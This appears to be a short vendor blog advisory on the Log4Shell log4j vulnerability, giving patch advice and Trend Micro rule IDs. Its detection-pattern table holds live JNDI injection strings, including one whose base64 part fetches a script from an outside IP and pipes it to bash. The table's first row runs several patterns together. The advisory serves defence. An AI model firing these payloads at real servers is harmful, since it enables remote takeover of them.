The past couple of days have been abuzz with news of a new critical vulnerability in Apache log4j. It has been aptly named “Log4Shell” and has already been published as CVE-2021-44228. This vulnerability is so severe that many security vendors are rating it as a 10 in severity levels.
What is it and why is it so severe?
Log4Shell is an exploit found in the popular Java logging library log4j that threat actors could easily execute to gain full server access to the unfortunate target. Services such as Steam, Apple iCloud, and even Minecraft have already been found to be vulnerable to the exploit. Businesses using Apache Struts are likely to be vulnerable.
What can I do to Mitigate this Vulnerability?
The best solution to this exploit is to immediately update your log4j to the latest patch (2.15.0). However, if you cannot immediately update then you must immediately talk with your security providers on their steps for temporary mitigation.
For our Trend Micro Customers, you may use the following rules for Trend Micro Cloud one:
Trend Micro Cloud One™ – Workload Security and Deep Security IPS, LI Rules
IPS Rule: 1011242 – Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
IPS Rule: 1005177 – Restrict Java Bytecode File (Jar/Class) Download
LI Rule: 1011241 – Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
Add custom LI rule to detect patterns as discovered in the future
Please follow the steps as mentioned on the following page and add the following sample patterns in the pattern matching field. You can add more patterns as you discover them over time.
S No. | Patterns for LI detection |
1 | ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==}2${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}3${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback} |
2 | ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback} |
3 | ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback} |
To learn more in detail about the Log4Shell Vulnerability, you may refer to the LunaSec guide or if you need further details on the Trend Micro Guide here.